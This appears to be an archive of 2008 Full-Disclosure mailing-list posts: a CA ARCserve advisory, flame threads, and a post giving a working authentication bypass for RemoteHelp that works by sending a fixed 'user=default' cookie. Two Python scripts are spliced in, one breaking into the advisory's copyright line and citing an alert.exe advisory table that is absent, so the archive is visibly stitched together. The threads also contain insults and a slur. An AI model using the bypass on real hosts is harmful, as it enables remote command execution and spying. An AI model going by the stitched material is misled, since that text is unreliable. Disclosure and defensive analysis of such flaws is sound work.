> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of RM
> Sent: Thursday, April 03, 2008 6:50 PM
> To: full-disclosure at lists.grok.org.uk
> Subject: [Full-disclosure] angry
>
> Sorry. I am angry and tired.
>
> "I WANT STUPID NON-ENGLISH SPEAKING IDIOTS TO STOP SPAMMING ME WITH YOUR MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!
>
> I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!
>
> --
> There, I feel better.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From James.Williams at ca.com Fri Apr 4 14:06:30 2008
From: James.Williams at ca.com (Williams, James K)
Date: Fri, 4 Apr 2008 09:06:30 -0400
Subject: [Full-disclosure] CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Vulnerabilities
Message-ID: <649CDCB56C88AA458EFF2CBF494B62040495BD19@USILMS12.ca.com>

Title: CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Vulnerabilities

CA Advisory Date: 2008-04-03

Reported By: Dyon Balding of Secunia Research

Impact: A remote attacker can execute arbitrary code or cause a denial of service condition.

Summary: CA ARCserve Backup for Laptops and Desktops Server contains multiple vulnerabilities that can allow a remote attacker to execute arbitrary code or cause a denial of service condition. CA has issued updates to address the vulnerabilities. The first issue, CVE-2008-1328, occurs due to insufficient bounds checking on command arguments by the LGServer service. The second issue, CVE-2008-1329, occurs due to insufficient verification of file uploads by the NetBackup service. In most cases, an attacker can potentially gain complete control of an affected installation. Additionally, only a server installation of BrightStor ARCserve Backup for Laptops and Desktops is affected. The client installation is not affected.

Note: the previously published patches for CVE-2007-3216 and CVE-2007-5005 did not fully address some issues.

Mitigating Factors: Client installations are not affected.

Severity: CA has given these vulnerabilities a maximum risk rating of High.

Affected Products:
CA ARCserve Backup for Laptops and Desktops r11.5
CA ARCserve Backup for Laptops and Desktops r11.1 SP2
CA ARCserve Backup for Laptops and Desktops r11.1 SP1
CA ARCserve Backup for Laptops and Desktops r11.1
CA ARCserve Backup for Laptops and Desktops r11.0
CA Desktop Management Suite 11.2 English
CA Desktop Management Suite 11.2 localized
CA Desktop Management Suite 11.1

Affected Platforms: Windows

Status and Recommendation:
CA has provided updates to address the vulnerabilities.
CA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.1 SP2: QO95512
CA ARCserve Backup for Laptops and Desktops 11.5: QO95513
CA Desktop Management Suite 11.2 English: QO95513
CA Desktop Management Suite 11.2 localized: QO95513
CA Desktop Management Suite 11.1: Upgrade to 11.1 C1.
CA ARCserve Backup for Laptops and Desktops 11.0: Upgrade to ARCserve Backup for Laptops and Desktops version 11.1 and apply the latest patches. QI85497

How to determine if you are affected:
For Windows:
1. Using Windows Explorer, locate the file "rxRPC.dll". The file can be found in the following default locations:
   Product: CA ARCserve Backup for Laptops and Desktops 11.5
   Directory Path: C:\Program Files\CA\BrightStor ARCserve Backup for Laptops & Desktops\Explorer
   Product: CA ARCserve Backup for Laptops and Desktops 11.1
   Directory Path: C:\Program Files\CA\BrightStor ARCserve Backup for Laptops & Desktops\server
   Product: CA Desktop Management Suite 11.2 English
   Directory Path: C:\Program Files\CA\DSM\BABLD\MGUI
   Product: CA Desktop Management Suite 11.2 localized
   Directory Path: C:\Program Files\CA\DSM\BABLD\MGUI
2. Right click on the file and select Properties.
3. Select the General tab.
4. If the file date is earlier than indicated in the below table, the installation is vulnerable.

Product                                              File Name   File Date / Size
CA ARCserve Backup for Laptops and Desktops 11.5     rxRPC.dll   February 18 2008 / 126976
CA ARCserve Backup for Laptops and Desktops 11.1     rxRPC.dll   February 18 2008 / 114688
CA Desktop Management Suite 11.2 English             rxRPC.dll   February 18 2008 / 126976
CA Desktop Management Suite 11.2 localized           rxRPC.dll   February 18 2008 / 126976

Workaround: None

References (URLs may wrap):
CA Support: http://support.ca.com/
Security Notice for CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=173105
Solution Document Reference APARs: QO95512, QO95513, QI85497
CA Security Response Blog posting: CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Vulnerabilities
http://community.ca.com/blogs/casecurityresponseblog/archive/2008/04/04/\
ca-arcserve-backup-for-laptops-and-desktops-server-and-ca-desktop-\
management-suite-multiple-vulnerabilities.aspx
Reported By: Dyon Balding of Secunia Research
CVE References: CVE-2008-1328 and CVE-2008-1329
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1328
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1329
OSVDB References: Pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form.
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx

Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2008 CA.
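Both CA advisories above reduce their "How to determine if you are affected" steps to a file attribute compared against a table, and each comparison has a trap: a dotted file version has to be compared field by field as integers (7.1.758.0 is earlier than 7.1.1000.0, but later as a string), and the rxRPC.dll check keys on the file date, with the listed size only telling you whether the file came from the named patch. The script below is an added example, not CA's code, that makes both checks scriptable. It assumes that the first VS_FIXEDFILEINFO record found in alert.exe is the module's own version record (a scan for the structure signature in place of walking the PE resource directory), that "file date" on the General tab is the modification time, and that the default install paths in the advisories are the ones to inspect; the bytes built by make_sample_pe_blob are constructed test input standing in for a real alert.exe.

```python
"""Scriptable form of the affected-version checks in the two CA advisories
(added example, not CA's code).

alert.exe : read the numeric file version out of the PE version resource
            (VS_FIXEDFILEINFO) and compare it, field by field, with the
            minimum fixed version for the product.
rxRPC.dll : compare the file's modification date with the fixed build date;
            the table's size only confirms the file came from the listed patch.
"""
import datetime
import os
import struct

# Minimum fixed alert.exe versions, from the first advisory's table.
ALERT_EXE_FIXED = {
    "CA Anti-Virus for the Enterprise r8.1": (8, 1, 586, 0),
    "CA Threat Manager for the Enterprise r8.1": (8, 1, 586, 0),
    "CA Threat Manager for the Enterprise r8": (8, 0, 450, 0),
    "CA Anti-Virus for the Enterprise 7.1": (7, 1, 758, 0),
    "CA Anti-Virus for the Enterprise r8": (7, 1, 758, 0),
    "BrightStor ARCserve Backup r11.5": (7, 1, 758, 0),
    "BrightStor ARCserve Backup r11.1": (7, 1, 758, 0),
}

# Fixed rxRPC.dll build date and per-product size, from the second advisory's table.
RXRPC_FIXED_DATE = datetime.date(2008, 2, 18)
RXRPC_FIXED_SIZE = {
    "CA ARCserve Backup for Laptops and Desktops 11.5": 126976,
    "CA ARCserve Backup for Laptops and Desktops 11.1": 114688,
    "CA Desktop Management Suite 11.2 English": 126976,
    "CA Desktop Management Suite 11.2 localized": 126976,
}

# dwSignature that opens a VS_FIXEDFILEINFO structure in a Windows version resource.
VS_FIXEDFILEINFO_SIGNATURE = 0xFEEF04BD


def version_tuple(text):
    """'7.1.758.0' -> (7, 1, 758, 0). Integer fields, so 7.1.1000.0 > 7.1.758.0,
    which a plain string comparison would get wrong."""
    parts = [int(p) for p in text.strip().split(".")]
    return tuple(parts + [0] * (4 - len(parts)))


def parse_fixed_file_info(pe_bytes):
    """Return (major, minor, build, private) from the first VS_FIXEDFILEINFO in
    pe_bytes, or None if none is present.

    Assumption of this example: the first signature hit is the module's own
    version record, which holds for an unpacked executable with one version
    resource; a full implementation would walk the PE resource directory."""
    off = pe_bytes.find(struct.pack("<I", VS_FIXEDFILEINFO_SIGNATURE))
    if off < 0 or off + 16 > len(pe_bytes):
        return None
    # dwSignature, dwStrucVersion, dwFileVersionMS, dwFileVersionLS
    _sig, _struc, ms, ls = struct.unpack_from("<4I", pe_bytes, off)
    return (ms >> 16, ms & 0xFFFF, ls >> 16, ls & 0xFFFF)


def alert_exe_is_vulnerable(product, observed):
    """Step 4 of the first advisory: earlier than the table version is vulnerable."""
    return tuple(observed) < ALERT_EXE_FIXED[product]


def alert_exe_check_path(product, path=r"C:\Program Files\CA\SharedComponents\Alert\alert.exe"):
    """Apply the version check to alert.exe on disk; None if no version record was found."""
    with open(path, "rb") as fh:
        observed = parse_fixed_file_info(fh.read())
    return None if observed is None else alert_exe_is_vulnerable(product, observed)


def rxrpc_is_vulnerable(file_date_iso):
    """Step 4 of the second advisory: a file date before the fixed build date is vulnerable."""
    return datetime.date.fromisoformat(file_date_iso) < RXRPC_FIXED_DATE


def rxrpc_size_matches_patch(product, size):
    """Secondary check: does the size match the patched rxRPC.dll listed for product?"""
    return size == RXRPC_FIXED_SIZE[product]


def rxrpc_check_path(product, path):
    """Apply both rxRPC.dll checks to a file on disk (mtime taken as the 'file date')."""
    st = os.stat(path)
    file_date = datetime.date.fromtimestamp(st.st_mtime).isoformat()
    return rxrpc_is_vulnerable(file_date), rxrpc_size_matches_patch(product, st.st_size)


def make_sample_pe_blob(version):
    """Constructed test input: a VS_FIXEDFILEINFO record inside filler bytes."""
    major, minor, build, private = version
    record = struct.pack("<4I", VS_FIXEDFILEINFO_SIGNATURE, 0x00010000,
                         (major << 16) | minor, (build << 16) | private)
    return b"MZ" + b"\x00" * 62 + record + b"\x00" * 24


if __name__ == "__main__":
    seen = parse_fixed_file_info(make_sample_pe_blob((7, 1, 700, 0)))
    print("alert.exe", ".".join(map(str, seen)), "vulnerable:",
          alert_exe_is_vulnerable("BrightStor ARCserve Backup r11.5", seen))
    print("rxRPC.dll dated 2008-01-15 vulnerable:", rxrpc_is_vulnerable("2008-01-15"))
```

On a live Windows host, call alert_exe_check_path and rxrpc_check_path with the product name and the directory the advisory lists for that product; the __main__ block only exercises the logic on the constructed bytes.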
All rights reserved.

From urlancomp at gmail.com Fri Apr 4 15:22:17 2008
From: urlancomp at gmail.com (Urlan)
Date: Fri, 4 Apr 2008 11:22:17 -0300
Subject: [Full-disclosure] angry
In-Reply-To:
References:
Message-ID: <8b88d71c0804040722y6fe0c45cpf9948fe799fa88c0@mail.gmail.com>

Easy, just leave the list =D.

Urlan

On Thu, Apr 3, 2008 at 7:50 PM, RM wrote:
> Sorry. I am angry and tired.
>
> "I WANT STUPID NON-ENGLISH SPEAKING IDIOTS TO STOP SPAMMING ME WITH YOUR MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!
>
> I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!
>
> --
> There, I feel better.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/579db8fb/attachment.html

From ureleet at gmail.com Fri Apr 4 15:31:14 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 10:31:14 -0400
Subject: [Full-disclosure] n3td3v has a fan
In-Reply-To: <2d792fb20804030620i795b851cu90c69b3f37dd82e5@mail.gmail.com>
References: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com> <4b6ee9310804021613n628cd00bj706125788bff60de@mail.gmail.com> <6158bb410804021715l29dafd00i1ba25ca63eb723bd@mail.gmail.com> <2d792fb20804030620i795b851cu90c69b3f37dd82e5@mail.gmail.com>
Message-ID: <6158bb410804040731l51df3697tf9d0aa1100d3d239@mail.gmail.com>

I'm trying not to form an opinion, but the general consensus doesn't seem very high.

On Thu, Apr 3, 2008 at 9:20 AM, Razi Shaban wrote:
> Actually, you're representing the opinion of the majority of the list. n3td3v is undoubtedly one of the most annoying posters, with an amazingly inflated sense of self-worth.
>
>
> --
> Razi
>
> On 4/3/08, Ureleet wrote:
> > You are the one bragging about making a difference; all I see is you being annoying. I don't know your full history on the mailing list, but from what I see, it's not very positive.
> >
> > And am I annoying everyone? Or just you? Speaking about stopping the Storm Worm and trying to stop the Storm Worm are two different things.
> >
> > On Wed, Apr 2, 2008 at 7:13 PM, n3td3v wrote:
> > > On Wed, Apr 2, 2008 at 11:46 PM, Ureleet wrote:
> > > > You like him because he posts your articles.
> > > >
> > > > You can have him.
> > > >
> > > > Stop trolling.
> > >
> > > I'm the one at the forefront of security trying to make a difference, and what are you? He supports me because of my cause to stop the Storm Worm, so what solutions have you got, instead of annoying everyone?
> > >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/1827e018/attachment.html From ureleet at gmail.com Fri Apr 4 15:28:58 2008 From: ureleet at gmail.com (Ureleet) Date: Fri, 4 Apr 2008 10:28:58 -0400 Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay In-Reply-To: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com> References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com> Message-ID: <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com> ive dealt a bit with tipping point and their zdi. how about you learn how it works first, the come back and criticize it? you obviously dont understand the contest at cansecwest, or how zdi plays into it. i was there, it was a good conf. but you need to learn how it works before you go ranting about it.... again... On Thu, Apr 3, 2008 at 5:38 PM, n3td3v wrote: > > On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff > wrote: > > Regarding the particular person in question, I'll defer to others who > know > > him (or her, or they, or whomever) better than I do. Instead, I'll say > that, > > generally, on lists like FD, there is a minority of out-spoken > personalities > > who sadly support the stereotypical hacker persona: condescending > egoists > > who are socially inept and emotionally charged when discussing topics > that > > relate to their knowledge domain. That's unfortunate, since the broader > IT > > security community is poorly represented due to attention-seeking > zealots. 
> > > > Regarding the idea of "oulawing security conference spamming," I'd say > the > > literal idea of outlawing cross-posts to multiple security mailing lists > is > > a bad idea. The idea that the legislature should write into law > legislation > > that reduces our freedom in such a sense is a slippery slope borne of > > emotionalism and narrowness. What else should the government do to > curtail > > our freedoms? I tend to side with libertarian types (though I don't call > > myself a "libertarian" un-qualified) on what the government should do > and > > what they should not do. And micro-manage security mailing lists is > > something they should not do. It's a bad idea and would make a dreadful > > precedent. > > Full-Disclosure is ment to be about free source, not making money. I'm > against people who make money come on the mailing lists, its > commerical spam. We can't allow this to continue, here are what I > don't like: > > - Come to our conference - profit... buy our ticket, get a macbook prize. > > - Hacking challenge prize - profit... they give you $5000 and sell it > to the vendor for a lot more. > > - Train to use our software -profit... over priced training for > software... not interested. > > On the issue of how much a vulnerability is worth, the prices are not > regulated, we need regulation into how much a vulnerability costs, > because the prices right now are wild. We need to take vulnerability > pricing off the blackmarket and onto a legitimate central website for > selling vulnerabilities, or cash rewards for disclosing a > vulnerability to a particular company or organisation. I don't like > sites like digital armaments which when i visited it, the content and > answers they gave were questionable, and people have complained about > digital armaments in the past. Its time to get pricing regulated and > defined, so everyone knows whos being joe jobbed and who isn't. 
> Can someone post to Full-Disclosure a price list of what they think a buffer overflow should be worth etc., and we can vote if we agree.
>
> So what I'm calling for is someone to post up a hacker's price list per vulnerability type.
>
> XSS/SQL should be worth something as well, so Morning_Wood can buy milk and a newspaper in the mornings after he's taken care of his wood.
>
> Sorry I've ended this e-mail with slight off-topicness, but I do think pricing needs to be defined.
>
> We can't dress up cash prizes/contests as something else as well; if a website is offering a $5,000 reward for a vulnerability, we need to know if we're being ripped off with the cash reward and how much can potentially be made after it's sold on.
>
> Robert Lemos even http://www.securityfocus.com/news/11510 talked about vulnerability pricing when Pwn2Own was on, and even the Pwn2Own cash reward might not be enough money compared to what a vulnerability *should* be worth, taking into consideration how much profit CanSecWest makes overall from people attending the conference.
>
> So you take into consideration how much a vulnerability should be worth, then the added worth, because it's a security conference, of how much should be added on to counter the profit being made by the event.
>
> A vulnerability should be worth more if it's disclosed at a security conference than if it's bought privately, because you've got to take profit and free advertising into the calculation.
>
> However, to round off, we can't allow the mailing lists to turn into a vulnerability marketplace; Full-Disclosure should be for free stuff, and other websites and mailing lists can be set up for *money making schemes and auctions*.
>
> We shouldn't allow the money makers directly to market X...
> if a link is put on Full-Disclosure by a member of the public on the fly then that's OK, but I think it's cheeky for the particular conference, contest runner or software trainer to be on the list themselves spamming everyone for a profiteering agenda.
>
> You mention cross-posting; that's not the issue here. It's the people making the money posting to make the money that offends me so much.
>
> And not even the lonely hacker who posts "I've got a vulnerability for sale for X" offends me; I don't mind that on Full-Disclosure. But what I do mind is if it's a company or organisation doing it that is directly the one making the money via vulnerability for sale, prize contest, security conference or "train to use our software!!!". That's the height of spam I just think is utterly wrong and unethical on any scale of acceptability.
>
> If a lonely hacker who works in a supermarket has a vulnerability to sell, I'm all for it being posted on Full-Disclosure, but not the big money conferences, prize hacking contests and software training guys.
>
> I come under the bracket of supermarket worker with nothing much going for me in life, so I should be allowed to sell a vulnerability on what's meant to be a mailing list for non-profit disclosure.
>
> If we tolerate the money making schemes much longer, eventually Full-Disclosure will be awash with conference, training, cash prize spam, etc. once everyone realises the full value of vulnerabilities and the huge amounts of money to be made from setting up a cash prize contest, the huge amounts of money to be made from setting up a security conference and the huge amounts of money to be made from training people to use your hax0r software.
> You will find it easy to shout me down and say n3td3v's an idiot, but wait till the vulnerability market really takes off and the prices of vulnerabilities are properly defined and regulated; you're going to see a huge increase in commercial spam on the mailing lists, like the Full-Disclosure mailing list. So we've got to define what's fair play e-mail and what's a company or organisation blatantly profiteering with X method of extracting money out of people and using skilled hackers to make money, and to promote a security conference, training etc.
>
> All the best,
>
> n3td3v

From ureleet at gmail.com Fri Apr 4 15:33:33 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 10:33:33 -0400
Subject: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow Vulnerability
Message-ID: <6158bb410804040733t5907006fg75a6c32d80cff145@mail.gmail.com>

Dear ZDI,

Please instruct n3td3v on your process. Oh sorry, you already have, in every email alert that you send!

"Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.
Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/"

Thanks.

On Thu, Apr 3, 2008 at 5:54 PM, wrote:
> ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-08-018
> April 3, 2008
>
> -- CVE ID:
> CVE-2008-1021
>
> -- Affected Vendors:
> Apple
>
> -- Affected Products:
> Apple QuickTime 7.4.1
>
> -- TippingPoint(TM) IPS Customer Protection:
> TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5998. For further product information on the TippingPoint IPS, visit:
> http://www.tippingpoint.com
>
> -- Vulnerability Details:
> This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple QuickTime Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
>
> The specific flaw exists within the parsing of QuickTime files that utilize the Animation codec. A lack of proper length checks can result in a heap based buffer overflow leading to arbitrary code execution under the context of the currently logged in user.
>
> -- Vendor Response:
> Apple has issued an update to correct this vulnerability.
> More details can be found at:
> http://support.apple.com/kb/HT1241
>
> -- Disclosure Timeline:
> 2008-02-07 - Vulnerability reported to vendor
> 2008-04-03 - Coordinated public release of advisory
>
> -- Credit:
> This vulnerability was discovered by:
> * Anonymous
>
> -- About the Zero Day Initiative (ZDI):
> Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
>
> [...]
>
> CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited.
> If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com.

From mastahflank at gmail.com Fri Apr 4 15:34:00 2008
From: mastahflank at gmail.com (josh)
Date: Fri, 4 Apr 2008 14:34:00 +0000
Subject: [Full-disclosure] angry
In-Reply-To: <8b88d71c0804040722y6fe0c45cpf9948fe799fa88c0@mail.gmail.com>
Message-ID: <384021458-1207319639-cardhu_decombobulator_blackberry.rim.net-641403760-@bxe032.bisx.prod.on.blackberry>

Absolutely! ...

Sent from my BlackBerry smartphone with SprintSpeed

-----Original Message-----
From: Urlan
Date: Fri, 4 Apr 2008 11:22:17
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] angry

Easy, just leave the list =D.

Urlan

On Thu, Apr 3, 2008 at 7:50 PM, RM wrote:
> Sorry. I am angry and tired.
>
> "I WANT STUPID NON-ENGLISH SPEAKING IDIOTS TO STOP SPAMMING ME WITH YOUR MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS! I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!
>
> -- There, I feel better.
From Valdis.Kletnieks at vt.edu Fri Apr 4 15:45:05 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 04 Apr 2008 10:45:05 -0400
Subject: [Full-disclosure] angry
In-Reply-To: Your message of "Thu, 03 Apr 2008 17:50:12 CDT."
Message-ID: <3136.1207320305@turing-police.cc.vt.edu>

On Thu, 03 Apr 2008 17:50:12 CDT, RM said:
> "I WANT STUPID NON-ENGLISH SPEAKING IDIOTS TO STOP SPAMMING ME WITH YOUR MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!

Quite often, the mis-spellings are *intentional*. If you're trying to get the word 'penis' through a spam/content filter that catches penis, p3nis, peenis, and a lot of other variants, you often need to get creative indeed in your typography....

From wh1t3h4t3 at yahoo.co.uk Fri Apr 4 15:48:12 2008
From: wh1t3h4t3 at yahoo.co.uk (Micheal Turner)
Date: Fri, 4 Apr 2008 15:48:12 +0100 (BST)
Subject: [Full-disclosure] n3td3v agenda & Solid Information Security State Release 0012a
Message-ID: <805292.91098.qm@web23315.mail.ird.yahoo.com>

n3td3v agenda & Cyber Security group
====================================
Solid Information Security State Release #0012a
MARKING: RESTRICTIONS APPLY.
FAO: WORLD LEADERS

== Introduction ==

A serious, high-risk, ultra-critical vulnerability has been identified in the Remote Help application that may be used by CIA, NSA and FBI employees when helping colleagues on anti-terror campaigns. RemoteHelp is a minimal HTTP server that allows one to view and control a remote PC running a 32-bit version of Microsoft Windows. The current version is 0.0.6 and runs stand-alone or installs as a service.
== URL ==

http://sourceforge.net/projects/remotehelp/

== HISTORY ==

After n3td3v agenda emailed the NSA, SANS and all information security groups and was found not to be taken seriously, high-risk proof of concept exploit code has been authored for a severe vulnerability in the Remote Help application, which may be used by any number of Yahoo!, Google!, Ebay! or NSA employees. This vulnerability gives rise to serious national infrastructure risk and should not be underestimated!

== Proof of Concept ==

I found a vulnerability in the pages.c file which generates the login page dialog and authenticates a user. After it checks that your "user" and "pass" parameters match the defaults (user/default) it does this:

strncpy(cookie,"user=default; path=/; expires=Sun, 11-May-2030 22:11:40 GMT",1024);

for a valid login, and for an invalid login it sets an expired cookie like so:

strncpy(cookie,"user=default; path=/; expires=Sun, 11-May-1970 22:11:40 GMT",1024);

All you have to do is add "Cookie: user=default; path=/; expires=Sun, 11-May-2030 22:11:40 GMT" to your HTTP request and you can bypass authentication to the Remote Help server and access the filesystem/exec commands/view the webcam of the hosts running it.

== Credit ==

n3td3v & documentation help by Michael Turner.

"Never trust your employees."

From kurtdillard at msn.com Fri Apr 4 16:20:56 2008
From: kurtdillard at msn.com (Kurt Dillard)
Date: Fri, 4 Apr 2008 12:20:56 -0300
Subject: [Full-disclosure] n3td3v agenda & Solid Information Security State Release 0012a
In-Reply-To: <805292.91098.qm@web23315.mail.ird.yahoo.com>

Whether or not the vulnerability exists as described, this email is laughable. Addressing it to "world leaders" shows everyone you're a self-deceiving egomaniac.
Complaining that the NSA, CIA, and FBI didn't respond to your ravings makes perfect sense for 3 reasons: first, nobody takes such poorly written rants seriously. Second, those agencies don't collect vulnerability data; that's the job of DHS and NIST with their NVD and US-CERT projects. Third, I've worked with a lot of federal agencies and none of them use this software; why would they when a perfectly usable remote assistance technology is already built into Windows? Oh, and by the way, employees at those agencies can't install the software themselves because their desktops are locked down and they don't have admin privileges.

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Micheal Turner
Sent: Friday, April 04, 2008 11:48 AM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] n3td3v agenda & Solid Information Security State Release 0012a

[...]
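The authentication check described in Micheal Turner's Remote Help post above, modelled as an added example. This is not RemoteHelp's code (which is C) and not code from any poster: the vulnerable functions reproduce the behaviour the post describes, where a constant "user=default" cookie is emitted on a successful login and any later request carrying that cookie is trusted, so the "session" is a public string anyone can type into a request by hand. The hardened variant beside it issues a random token per login, accepts only tokens it remembers issuing, and revokes on the server side rather than by handing the client an expired cookie. Function and class names, and the use of a raw Cookie header string as input, are assumptions for illustration.

```python
"""Fixed-cookie authentication bypass, modelled after the Remote Help post.

Added illustration, not RemoteHelp's code. The vulnerable functions reproduce
the behaviour described in the post: a constant cookie is emitted on login and
any request presenting it is trusted. The hardened SessionStore issues a random
token per login and accepts only tokens it issued. All names are assumptions.
"""
import hmac
import secrets
from typing import Dict, Optional, Set

# Shipped default credentials mentioned in the post.
DEFAULT_USER = "default"
DEFAULT_PASS = "default"

# The constant the post quotes from pages.c (the 1970 variant is the "logged
# out" cookie; this 2030 variant is the "logged in" one).
FIXED_COOKIE = "user=default; path=/; expires=Sun, 11-May-2030 22:11:40 GMT"


def parse_cookie_header(header: Optional[str]) -> Dict[str, str]:
    """Split a raw Cookie: request header into name -> value (first wins)."""
    jar: Dict[str, str] = {}
    for part in (header or "").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar.setdefault(name.strip(), value.strip())
    return jar


def _creds_ok(user: str, password: str) -> bool:
    """Constant-time comparison of both fields against the configured pair."""
    return (hmac.compare_digest(user.encode(), DEFAULT_USER.encode())
            and hmac.compare_digest(password.encode(), DEFAULT_PASS.encode()))


# ---- vulnerable pattern: the cookie *is* the credential, and it is public ----

def vulnerable_login(user: str, password: str) -> Optional[str]:
    """Return the Set-Cookie value on success; it is identical for everyone."""
    return FIXED_COOKIE if _creds_ok(user, password) else None


def vulnerable_is_authenticated(cookie_header: Optional[str]) -> bool:
    """Trusts any client that presents user=default; no login ever required."""
    return parse_cookie_header(cookie_header).get("user") == DEFAULT_USER


# ---- hardened pattern: unguessable, server-remembered session token --------

class SessionStore:
    """Tracks tokens issued by this server (a set here; a DB in practice)."""

    def __init__(self) -> None:
        self._tokens: Set[str] = set()

    def login(self, user: str, password: str) -> Optional[str]:
        """Issue a fresh 256-bit token only after the credential check passes."""
        if not _creds_ok(user, password):
            return None
        token = secrets.token_urlsafe(32)  # OS CSPRNG, URL-safe base64
        self._tokens.add(token)
        return f"session={token}; Path=/; HttpOnly; Secure; SameSite=Strict"

    def is_authenticated(self, cookie_header: Optional[str]) -> bool:
        """Accept only a token this server issued, compared in constant time."""
        presented = parse_cookie_header(cookie_header).get("session", "")
        return any(hmac.compare_digest(presented.encode(), t.encode())
                   for t in self._tokens)

    def logout(self, cookie_header: Optional[str]) -> None:
        """Revoke server-side; an 'expired' cookie sent to the client revokes nothing."""
        self._tokens.discard(parse_cookie_header(cookie_header).get("session", ""))


def session_token_from_set_cookie(set_cookie: str) -> str:
    """Pull the token out of the Set-Cookie value the store returned."""
    return parse_cookie_header(set_cookie).get("session", "")


if __name__ == "__main__":
    forged = "user=default; path=/; expires=Sun, 11-May-2030 22:11:40 GMT"
    print("vulnerable accepts typed-in cookie:", vulnerable_is_authenticated(forged))
    store = SessionStore()
    print("hardened accepts typed-in cookie:", store.is_authenticated(forged))
    issued = store.login("default", "default")
    print("hardened accepts its own token:",
          store.is_authenticated("session=" + session_token_from_set_cookie(issued)))
```

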